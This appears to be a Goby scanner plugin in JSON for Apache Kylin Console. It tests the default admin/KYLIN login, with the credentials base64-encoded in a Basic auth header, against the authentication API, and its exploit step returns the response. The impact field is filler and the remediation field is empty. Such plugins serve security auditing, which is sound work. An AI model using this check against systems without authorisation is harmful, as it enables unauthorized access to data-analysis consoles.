Goby/json/Apache Kylin Console ┐╪╓╞╠¿...

76 lines
2.7 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "Apache Kylin Console 控制台弱口令",
"Level": "2",
"Tags": [
"弱口令"
],
"GobyQuery": "app=\"APACHE-kylin\"",
"Description": "Apache Kylin Console 控制台存在默认弱口令 adminKYLIN可被登录控制台进一步利用其他漏洞",
"Product": "Apache Kylin",
"Homepage": "http://kylin.apache.org/",
"Author": "PeiQi",
"Impact": "<p><span style=\"color: rgb(65, 140, 175);\">咩咩咩🐏</span></p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"HasExp": true,
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/kylin/api/user/authentication",
"follow_redirect": true,
"header": {
"Authorization": "Basic YWRtaW46S1lMSU4=",
"Cookie": "project=null"
},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$code",
"operation": "!=",
"value": "401",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/kylin/api/user/authentication",
"follow_redirect": true,
"header": {
"Authorization": "Basic YWRtaW46S1lMSU4=",
"Cookie": "project=null"
},
"data_type": "text",
"data": ""
},
"SetVariable": [
"output|lastbody"
]
}
],
"PostTime": "2021-01-24 13:23:42",
"GobyVersion": "1.8.237"
}